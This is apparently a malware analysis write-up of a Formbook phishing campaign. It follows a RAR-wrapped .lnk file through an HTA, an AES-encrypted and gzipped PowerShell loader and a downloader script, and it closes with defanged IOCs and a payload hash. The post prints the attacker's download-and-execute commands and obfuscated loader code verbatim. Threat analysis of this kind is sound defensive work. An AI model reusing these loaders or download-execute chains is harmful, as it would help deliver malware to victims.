[QuickNote] Examining Formbook Campaign via Phishing Emails

1. Initial foothold

The attacker sent an email with an attachment named “brochure-for-2023-elite-events.rar”. This rar file contains only one lnk (shortcut) file named: brochure-for-2023-elite-events.pdf.lnk. If the user does not pay attention and extracts the file, it will be displayed as a PDF icon like the following:

The analysis of this lnk file reveals that it utilizes powershell.exe to execute an hta script.

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" \W*\\\*2\\\msh*e ('http'+'://thanhancompany[.]com/ta/pintu'+'.hta')

2. Analyzing HTA script

Download the file pintu.hta for analysis. This file contains a VBScript code snippet as follows:

To facilitate the deobfuscation of the code snippet above, I have modified it as follows:

The modified pintu.hta file is executed, resulting in a Vbscript containing a function that executes a subsequent PowerShell script.

3. Analyzing the 1^st Powershell script

ZAA = "powershell[.]exe -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $xbFz = 'AAAAAAAAAAAAAAAAAAAAAJdvrhrN5YvnQDuOBHjZkKQBQBWq7g/BqHoljVe1piiopnWmXE1HRnwJG/6Na9hUKa79iqZh9y+wn4+kzAAlzD85MdKFFOBhAhchbdcmCYl/JH7upYbQ39jEUMnnhdgbq4jLkewjKf+KbwDItaZamfTDsOFaJvrzsndxNKD5O7xv5WganAeSUbBiESZnv4hzbgAQVNW9+Ic9OCFhhVz6XBi9vBLLIS8B3lr9+bIpXc06HfXj+QXGzaUIl1bcY32r0C5UcmbshIQ+JAd4VgiIE5LNXajgWbqCDrce3Ej6v9b58Pb4ox5ljPJgxu2TJUA8gicsxE/ws5pJ49Docx3fkhq/j3G49owfZ2Pn2PBAq4eJ1aSQ64NTbotuWLHKBSVycqZAawr+dX2CmfMT68dWzmyneVK1hocB3RCbRrUr64aEscvQL+UKBqM1wYnuvO7atyhuAn2yfOsjxS6f3N47Crs1/fzH0JWQ/qb9ABNrGwmeo7jCQYBk67Yo9clvJtocynzeQy1d20puVEoF2pUISYvSRBaToYiFwhPM0R9pGwnlC7qyBlepmZ5zfLAeJJ3NkZyRX9MXxgNf+ZOW+0N5c4lJA2KzbtyWakcmBSS1GTLaZw9BL4Ota2QaUNdx+lVipYwILt1TMME0n7qoEGDYvAzsD3ML8hL5ruwYVGIxUkn8uEgkp9M23Oxiii+GG5mJUQHRwonMomATOefw/LUVcwox8NXFojcyPTSAgP3EBmtYTai3SFhTh0uYeWGgy95imVnfCFdkKx12dDCYRFnv17lOiQnIhuFXmwuF6VeXMgPaA+yxzbU3i1yhQ2Z6zBeFadSD/IkXTagIdPbU0jZrrB7lMsLqaNHeACVtBmC6AsaCE7cKicTd1cOUGLEesNL4B7AJxnYj2G56LEkYHOwpjn5lqOeX5dTwFjSpb1DFP9mbvjFkC+pHWL4c97/PXeLaNjVJgafxi62HjK6zKQYcoTbiqIMoxTRLRFeOYNDmELdA';$HMTijTI = 'bllXeHFBWFhNYU9kcHFnRFNSbk1EQVVSUmJqQm5Wb0w=';$BfslXFB = New-Object 'System.Security.Cryptography.AesManaged';$BfslXFB.Mode = [System.Security.Cryptography.CipherMode]::ECB;$BfslXFB.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$BfslXFB.BlockSize = 128;$BfslXFB.KeySize = 256;$BfslXFB.Key = [System.Convert]::FromBase64String($HMTijTI);$JmaZB = [System.Convert]::FromBase64String($xbFz);$myyVlryP = $JmaZB[0..15];$BfslXFB.IV = $myyVlryP;$xgdtNsuBK = $BfslXFB.CreateDecryptor();$KbcpSLgDq = $xgdtNsuBK.TransformFinalBlock($JmaZB, 16, $JmaZB.Length - 16);$BfslXFB.Dispose();$bDcpNBr = New-Object System.IO.MemoryStream( , $KbcpSLgDq );$OmEpFPG = New-Object System.IO.MemoryStream;$DswuaJEln = New-Object System.IO.Compression.GzipStream $bDcpNBr, ([IO.Compression.CompressionMode]::Decompress);$DswuaJEln.CopyTo( $OmEpFPG );$DswuaJEln.Close();$bDcpNBr.Close();[byte[]] $dhbwdLTm = $OmEpFPG.ToArray();$SRunF = [System.Text.Encoding]::UTF8.GetString($dhbwdLTm);$SRunF | powershell - }"

The script performs the following tasks:

• Decode the base64 string assigned to the variable $xbFz and uses the first 16 bytes as the IV, while the remaining part is the encrypted data:

• Decode the base64 string assigned to the variable $HMTijTI and use it as the AES key:

• Using the key and IV, decrypt the encrypted data using AES in mode $BfslXFB.Mode = [System.Security.Cryptography.CipherMode]::ECB:

• Based on the result of the first two bytes being 0x1F 0x8B, we know that the decrypted data has been compressed using Gzip. Decompressing this data yields the next PowerShell script:

4. Analyzing the 2^nd Powershell script

The important part of this script is as follows:

function Dlt($iZq)
{
    $IBY = 6399;
    $dtu = $Null;
    foreach($kKX in $iZq)
    {
        $dtu += [char]($kKX - $IBY)
    };
    return $dtu
};
function RPJ()
{
    $oUv = $env: AppData + '\';$DASUDIl= $env:AppData;$GXIrywM = $DASUDIl + '\blank.pdf ';If(Test-Path -Path $GXIrywM){Invoke-Item $GXIrywM;}Else{ $kjrkrCO = zPg (Dlt @(6503,6515,6515,6511,6514,6457,6446,6446,6508,6496,6502,6445,6518,6498,6510,6510,6508,6499,6445,6510,6513,6502,6446,6516,6511,6507,6510,6496,6499,6514,6446,6449,6447,6448,6455,6446,6447,6452,6446,6497,6507,6496,6509,6506,6445,6511,6499,6501));lWh $GXIrywM $kjrkrCO;Invoke-Item $GXIrywM;};;;$DauGlabYW = $oUv + '
    883.exe '; if (Test-Path -Path $DauGlabYW){pmh $DauGlabYW;}Else{ $ZbmZaJRahvY = zPg (Dlt @(6503,6515,6515,6511,6514,6457,6446,6446,6515,6503,6496,6509,6503,6496,6509,6498,6510,6508,6511,6496,6509,6520,6445,6498,6510,6508,6446,6502,6513,6504,6511,6446,6455,6455,6450,6445,6500,6519,6500));lWh $DauGlabYW $ZbmZaJRahvY;pmh $DauGlabYW;};;}RPJ;

It can be observed that it will use the Dlt function to decode the download addresses of the files (next stage payloads). By rewriting this function in Python and performing the decoding, we obtain the download addresses for the payload and decoy PDF as follows:

[+] Defanged URL(s):

hxxps://mag[.]wcoomd.org/uploads/2018/05/blank.pdf
hxxps://thanhancompany[.]com/grip/883.exe

5. Formbook payload

At the time of analysis, I was able to successfully download the payload, its sha256 is: 00f20471ea61f5b0f5a1e2e9be722369ea515aaea80283aa046bd47e51f952e4

The .NET payload, when executed, will unpack the final payload, which is the payload of the FormBook malware (this is likely a new build of the malware).

Utilize Fakenet and monitor the payload generation process to generate traffic to hosts:

6. IOCs:

hxxp://thanhancompany[.]com/ta/pintu.hta	Hta script
hxxps://mag[.]wcoomd.org/uploads/2018/05/blank.pdf	Decoy PDF
hxxps://thanhancompany[.]com/grip/883.exe	Payload URI
00f20471ea61f5b0f5a1e2e9be722369ea515aaea80283aa046bd47e51f952e4	Payload SHA256

End.

m4n0w4r